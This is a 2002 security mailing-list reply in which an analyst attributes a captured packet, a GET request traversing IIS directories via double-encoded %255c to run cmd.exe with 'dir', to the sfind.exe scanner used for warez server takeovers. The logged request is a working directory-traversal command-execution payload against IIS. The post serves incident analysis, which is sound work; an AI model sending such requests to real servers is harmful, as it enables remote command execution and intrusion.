Security Incidents mailing list archives
Re: Unicode worm?
From: pj () esec dk
Date: Fri, 23 Aug 2002 13:43:25 +0200
I think the single-request attack you describe corresponds to this payload: 06/17/02-18:12:39.590684 192.84.105.44:2468 -> X.X.X.X:80 TCP TTL:108 TOS:0x0 ID:3615 IpLen:20 DgmLen:99 DF ***AP*** Seq: 0xC14916B Ack: 0xC6B3FB9C Win: 0x40B0 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E 255c%255c../winn 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e 78 65 3F 2F 63 2B 64 69 72 0D 0A xe?/c+dir.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ If Unicode translation is applied %255c%255c is seen as %5c%%5c, This request is sent by the unicode option of the sfind.exe tool. Sfind.exe origins from China, I have seen it used in different toolkits for semi-automated establishment of Warez "FXP" servers on vulnerable IIIS servers, see http://www.esec.dk/pubstro.pdf best regards Peter Jelver ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Unicode worm? Turner, Keith (Contractor) (Aug 21)
- Re: Unicode worm? Soeren Ziehe (Aug 21)
- Re: Unicode worm? John Sage (Aug 21)
- Re: Unicode worm? Kurt Seifried (Aug 22)
- Re: Unicode worm? Jonathan Rickman (Aug 23)
- <Possible follow-ups>
- RE: Unicode worm? Larsen, Colin (Aug 21)
- Re: Unicode worm? Dean White (Aug 22)
- RE: Unicode worm? Deus, Attonbitus (Aug 22)
- RE: Unicode worm? Turner, Keith (Contractor) (Aug 22)
- Re: Unicode worm? pj (Aug 23)
- Re: Unicode worm? Soeren Ziehe (Aug 21)